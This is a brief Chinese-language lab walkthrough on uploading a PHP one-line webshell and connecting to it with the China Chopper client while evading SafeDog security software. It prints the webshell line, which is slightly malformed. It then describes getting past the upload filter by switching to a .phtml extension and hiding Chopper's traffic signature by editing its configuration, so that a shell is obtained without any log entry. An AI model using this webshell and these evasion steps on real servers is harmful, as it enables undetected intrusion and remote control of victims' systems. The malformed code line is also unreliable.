1、先试着上传一句话木马1.php
<?php @eval($_POST([cmd]);?>
打开目标机查看安全狗日志
可以看出,安全狗策略禁止上传.php文件
2、马被免杀,菜刀没被免杀
可以考虑更改后缀名为.phtml再次上传
上传成功
使用菜刀连接,发现连接失败
打开目标机查看安全狗日志
出现chooper工具这一句话,证明马免杀,菜刀没免杀
3、菜刀免杀,马没免杀
第一步已经知道安全狗拦截.php文件,可以在目标系统上先写一个一句话木马1.php文件,然后再使用菜刀连接,查看效果。
使用菜刀连接,发现连接失败
查看日志记录为
证明马免杀,菜刀没免杀
4、菜刀免杀 马免杀
修改菜刀配置文件
不出现任何记录,可以使用菜刀直接获取shell
隐藏菜刀流量特征
可在日志文件中查看
